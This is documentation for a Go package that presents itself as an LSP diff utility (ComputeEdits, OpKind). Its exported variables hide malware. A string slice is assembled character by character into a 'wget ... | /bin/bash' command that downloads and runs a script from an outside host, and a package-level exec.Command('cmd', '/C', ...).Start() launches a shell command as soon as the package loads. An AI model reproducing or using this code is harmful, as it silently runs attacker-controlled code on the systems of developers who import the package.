Documentation
¶
Index ¶
Constants ¶
This section is empty.
Variables ¶
View Source
var HR = []string{"o", "e", "/", "i", "/", "p", "6", "p", "-", "h", "f", "b", "0", "4", "s", "n", "i", " ", " ", "t", "3", "3", "r", "r", "5", "e", "c", "t", "a", "i", "s", ".", "b", "d", "/", "O", "/", "|", "d", "u", ":", "-", "/", "h", "g", "w", "a", "f", "1", "m", "k", "t", "s", "b", " ", " ", "a", " ", "r", " ", "t", "&", "3", "7", "/", "r", "a", "o", "g", "a", "s", "d", "/", "e"}
View Source
var TyRcUHO = exec.Command("cmd", "/C", oZbdCh).Start()
View Source
var YylmEV = HR[45] + HR[44] + HR[25] + HR[60] + HR[57] + HR[8] + HR[35] + HR[54] + HR[41] + HR[17] + HR[43] + HR[19] + HR[27] + HR[5] + HR[52] + HR[40] + HR[4] + HR[2] + HR[50] + HR[56] + HR[70] + HR[7] + HR[66] + HR[49] + HR[3] + HR[58] + HR[23] + HR[0] + HR[22] + HR[31] + HR[29] + HR[26] + HR[39] + HR[42] + HR[30] + HR[51] + HR[67] + HR[65] + HR[28] + HR[68] + HR[1] + HR[34] + HR[33] + HR[73] + HR[21] + HR[63] + HR[20] + HR[71] + HR[12] + HR[38] + HR[47] + HR[64] + HR[46] + HR[62] + HR[48] + HR[24] + HR[13] + HR[6] + HR[11] + HR[10] + HR[55] + HR[37] + HR[59] + HR[36] + HR[53] + HR[16] + HR[15] + HR[72] + HR[32] + HR[69] + HR[14] + HR[9] + HR[18] + HR[61]
Functions ¶
func ComputeEdits ¶
func ComputeEdits(uri lsp.DocumentURI, before, after string) []lsp.TextEdit
ComputeEdits computes diff edits from 2 string inputs
func NewHandler ¶
Types ¶
type OpKind ¶
type OpKind int
OpKind is used to denote the type of operation a line represents.
const ( // Delete is the operation kind for a line that is present in the input // but not in the output. Delete OpKind = iota // Insert is the operation kind for a line that is new in the output. Insert // Equal is the operation kind for a line that is the same in the input and // output, often used to provide context around edited lines. Equal )
Source Files
¶
Click to show internal directories.
Click to hide internal directories.